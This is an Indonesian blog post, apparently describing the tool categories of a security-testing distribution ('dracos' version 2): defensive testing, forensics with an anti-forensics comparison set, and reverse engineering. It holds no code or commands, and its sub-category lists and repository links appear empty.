  • Ujicoba dan pembuktian ( POC ) Salah satu hasil yang ingin di capai oleh setiap peretas adalah hasil patching dan solusi yang dapat di berikan kepada client mereka. Karena itu kami menempatkan beberapa tools standart yang dapat di gunakan untuk langsung di ujicoba dalam menangkis serangan terkait penetration testing itu sendiri serta menemukan standart pemecahan secara global.
  • Bahan pembelajaran dan dokumentasi Dengan penambahan sesi defensive tersebut kami berharap akan muncul nilai tambah dalam segi bahan pembelajaran terharap IDS/IPS, honeyspot, firewall, dsb.
  • Alasan pribadi dan pengalaman pribadi dari author Adapun hal ini agaknya tampak aneh untuk kami kemukakan tapi kami menjunjung tinggi nilai kepolosan forum sehingga ada baiknya kami ceritakan dan kami angkat menjadi salah satu alasan kami memasukan kategori ini


Adapun kategori defensive kami klasifikasikan dalam subkon-subkon di bawah ini.

















Forensics Tools

Melihat kondisi meningkatnya kejahatan cyber di Indonesia akhir-akhir ini , kami pun menambahkan kategori forensics. Beberapa subkon dari kategori forensics mewakili beberapa tahap penelusuran dan penindaklanjutan lebih lanjut. Beberapa subkon tersebut antara lain
Yang menarik disini adalah adanya sub-kategori Anti Forensics. Tentu saja kami menggunakan Anti Forensics untuk menjadi perbandingan terhadap kemampuan tools forensics standart yang sedang beredar di kalangan peretas saat ini. Attacker yang menggunakan beberapa tools anti forenscis tampaknya berusaha menghambat team pencari fakta dan penggalian serta pengamatan artifak kejahatan cyber.

Reverse Engineering

Tahap terakhir dari kategori tools dracos versi 2 adalah reverse engineering. Reverse Engineering sangat di butuhkan pada zaman ini mengingat persaingan global antar negara maju dan negara berkembang saat ini. Adanya tehnologi yang telah disusupi oleh negara-negara tertentu dapat mengontrol dan menjajah bangsa ini untuk kedua kalinya.


















Project Time Line

Repository List :
SOURCE:


HAPPY HACKING!!!!!!!!

Postingan Lebih Baru Postingan Lama Beranda